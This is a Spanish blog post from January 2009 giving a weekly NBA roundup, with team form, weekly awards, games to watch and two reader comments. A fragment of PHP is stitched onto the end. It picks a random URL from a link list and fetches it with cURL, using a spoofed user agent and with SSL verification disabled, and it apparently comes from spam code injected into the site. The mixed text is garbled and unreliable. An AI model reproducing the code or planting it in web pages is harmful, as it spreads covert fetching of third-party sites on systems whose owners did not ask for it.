Informe Semanal (Semana 13)

26 de January de 2009 por txusma

En la cumbre, los dos finalistas del año pasado. En el pozo, uno de los candidatos a sucederlos. Y es que lo difícil no es llegar, sino mantenerse. Veamos ese informe.

ON FIRE:

Verdes y amarillos han acabado la semana inmaculados y ambos con victorias de calidad como la de los Celtics que rompía la racha de Orlando o las de los Lakers frente Cavaliers y Spurs. Boston encadena 8 victorias consecutivas demostrando que ya ha superado el bache de las anteriores semanas y Los Angeles, con todos sus efectivos ya de vuelta, continúan siendo el equipo con mejor balance de la NBA.

A BUEN RITMO:

Cavaliers, Hawks, Nuggets, Blazers, Rockets y Hornets están acostumbrados a verse tan arriba en el Informe Semanal pero Wolves y Knicks aún deben sentir un poco de vértigo. El equipo de McHale lleva 9 victorias y tan solo 2 derrotas en este mes de enero y las sensaciones que deja no pueden ser mejores. Por su parte, New York se congratula de la vuelta de Gallinari y lo celebra con 3 victorias que le acercan a los puestos de Playoffs. Hay que destacar el buen papel de los Rockets a pesar de las bajas. Ahora le ha tocado a Yao Ming.

AL TRAN AL TRAN:

Otros que no pierden de vista los Playoffs del Este son Sixers, Bobcats, Raptors, Pacers y Bucks, enzarzados todos en una igualadísima carrera por  los últimos puestos que dan acceso a la post-temporada. Los Raptors han notado y de qué manera la vuelta de Calderón, mientras que los Bucks han perdido, posiblemente para lo que queda de temporada, a Michael Redd. En una situación tan igualada las lesiones serán fundamentales. Miami y Detroit miran esta carrera con relativa calma pero en ningún caso deberían despistarse. Sorprende el bajón de los Pistons respecto de temporadas anteriores (Pregunta irónica: ¿Cuál es la principal diferencia?).

En el Oeste la lucha principal es entre Mavs, Suns y Jazz, y esta semana los de Nowitzki han sido capaces de recortar un pelín la ventaja. Eso sí, aparte de Nowitzki es imprescindible que Howard y Kidd aporten. Thunder y Warriors, que ahora con Ellis seguro que darán algún susto, también firman una buena semana.

AL BORDE DEL ABISMO:

Como decíamos anteriormente, Suns y Jazz notan el aliento de los Mavs aún más cerca que la semana pasada y tan solo han sumado una victoria cada uno esta semana. En el Este, New Jersey parece perder fuerza con el paso de las semanas pero el sábado consiguieron romper la racha de 5 derrotas consecutivas que se alargaba ya desde el pasado 14 de enero. Los Wizards se consolidan como el peor equipo de la conferencia. Por su parte, los Clippers también consiguen ganar un solo partido pero sus rookies Eric Gordon y DeAndre Jordan no dejan de darles alegrías.

EL POZO:

Ninguna alegría en cambio para los Magic, que encajaron dos derrotas consecutivas después de la racha de 7 victorias, ni para los Bulls, que cada vez se ven más lejos de Playoffs, ni para Kings y Grizzlies. Los últimos encadenan 9 derrotas seguidas.

PREMIOS SEMANALES

MVP: Ha sido el máximo anotador, el segundo máximo reboteador y el sexto mejor ladrón de la semana en la NBA. Así que nos da igual que su equipo lograse un discreto balance de 1-1, porque Kevin Durant merece aparecer aquí con sus 36.5 puntos, 13.5 rebotes, 4.5 asistencias y 2.5 robos por partido. LeBron James, claro, ha de ser mencionado una vez más con 30.5 puntos, 9.8 rebotes y 8.8 asistencias de media en cuatro partidos.

El rookie: Eric Gordon y Russell Westbrook se pusieron las botas, pero esta ha sido la semana de Greg Oden. Por fin. En tres partidos ha logrado medias de 17.3 puntos con cerca del 65% de acierto, 12.3 rebotes, 1.3 robos y 1 tapón.

La sorpresa: Que Kobe Bryant no esté ni entre los 50 máximos anotadores semanales y, en cambio, se encuentre en el Top-10 de asistentes es toda una sorpresa. Los Lakers han funcionado como la seda esta semana, han logrado cuatro cómodas victorias y Bryant ha jugado y ha hecho jugar.

La decepción: Sus 23 puntos de anoche no libran a Amaré Stoudemire de ser una de las decepciones semanales. Un jugador como él no puede permitirse dos actuaciones tan pobres como las suyas ante Celtics y Bobcats y un promedio en cuatro partidos de 14.5 puntos con un 36.4% en tiros, 4.8 rebotes, 1.5 asistencias, 1 tapón, 0 robos y 4 pérdidas de balón.

RAZONES PARA TRASNOCHAR

Esta próxima madrugada se disputarán siete partidos y, pese a que no juega ninguno de los seis equipos con mejor balance, encontramos razones de sobra para trasnochar.

Sixers @ Hornets. El enfrentamiento entre Philly y New Orleans pondrá a prueba, por un lado, la resurrección de los Sixers y, por otro, la resistencia de los Hornets sin sus dos hombres interiores. West y Chandler siguen lesionados, por lo que Byron Scott ha de recurrir a Marks y Ely como remiendo de urgencia. Los Sixers, en cambio, vienen lanzados, con una sola derrota (con buzzer beater de Nowitzki) en los últimos nueve partidos. Los Andre, Iguodala y Miller, han tomado las riendas, el equipo ha aumentado un par de marchas su ritmo de juego y los resultados han sido magníficos, tanto que el equipo ya aspira incluso a la cuarta plaza del Este. A las 2:00 horas de la madrugada.

– El jugador al que recomendamos seguir esta noche es… Ron Artest. Le encanta sentirse protagonista y su visita a los Knicks, a su NY natal, supone para él una tentación demasiado grande como para dejarla pasar. A las 1:30 h.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    La semana de los Lakers ha sido magnífica, y ante todo ha dejado las primeras pistas serias de la recuperación absoluta de Andrew Bynum. A mí anoche, pese a que los números no fueron como ante Clips o Wizards, me pareció que hizo un partidazo. También se le ha notado al equipo que ha recuperado a todos sus jugadores, con lo que ha aumentado la intensidad tanto en defensa como en ataque. Ayer Farmar, en su regreso, volvió a mostrarse capaz de cambiar el ritmo.

    Y los Celtics se han recuperado y ahora muerden. Vaya repaso le metieron a los Mavs. En el segundo cuarto ya estaba decidido, fue un baño brutal.

      Citar

  2. Jabho dice:
    #2

    Diría que es seguro que Celtics y Lakers volverán a travesar algún bache antes de abril, pero por eso no hay que preocuparse.

    Los C´s han encontrado a un House que está tirando de lujo y un Glen Davis que se ha hecho con el primer jugador de rotación por dentro por delante de Powe.

    Jazz, Hornets y algún otro no terminan de arrancar. Y los Pistons no sé, no me extrañaría que se dejaran llevar y se vieran fuera de PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>